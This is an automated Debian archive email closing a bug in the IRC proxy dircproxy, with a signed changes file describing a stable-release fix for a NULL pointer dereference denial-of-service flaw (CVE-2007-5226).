Source: dircproxy
Source-Version: 1.0.5-5etch1

We believe that the bug you reported is fixed in the latest version of
dircproxy, which is due to be installed in the Debian FTP archive:

dircproxy_1.0.5-5etch1.diff.gz
  to pool/main/d/dircproxy/dircproxy_1.0.5-5etch1.diff.gz
dircproxy_1.0.5-5etch1.dsc
  to pool/main/d/dircproxy/dircproxy_1.0.5-5etch1.dsc
dircproxy_1.0.5-5etch1_i386.deb
  to pool/main/d/dircproxy/dircproxy_1.0.5-5etch1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Martin Zobel-Helas <[EMAIL PROTECTED]> (supplier of updated dircproxy package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Thu, 24 Jan 2008 09:11:16 +0100
Source: dircproxy
Binary: dircproxy
Architecture: source i386
Version: 1.0.5-5etch1
Distribution: stable
Urgency: low
Maintainer: Alex Pennace <[EMAIL PROTECTED]>
Changed-By: Martin Zobel-Helas <[EMAIL PROTECTED]>
Description: 
 dircproxy  - IRC proxy for people who use IRC from different workstations
Closes: 445883
Changes: 
 dircproxy (1.0.5-5etch1) stable; urgency=low
 .
   * Non-maintainer upload by SRM
   * Backport upstream patch to fix a NULL pointer reference, which
 can lead to a DoS (Closes: #445883)
 Fixes: CVE-2007-5226
Files: 
 567a30ce73ab51456c9c561717f9fbb7 578 net optional dircproxy_1.0.5-5etch1.dsc
 458702fb8f57d35ed431762ebf6f9986 14786 net optional 
dircproxy_1.0.5-5etch1.diff.gz
 ad5041f7ffbf4bacf7be31f24ac6a5f1 121220 net optional 
dircproxy_1.0.5-5etch1_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHmEktST77jl1k+HARAn+uAKDnwEU+Xx5fKwF8RYSFVPN7CP+zwQCgpwZW
nBWwilZu1hB6SGzzzwZF3x0=
=LIs5
-END PGP SIGNATURE-


--- End Message ---


  1   2   >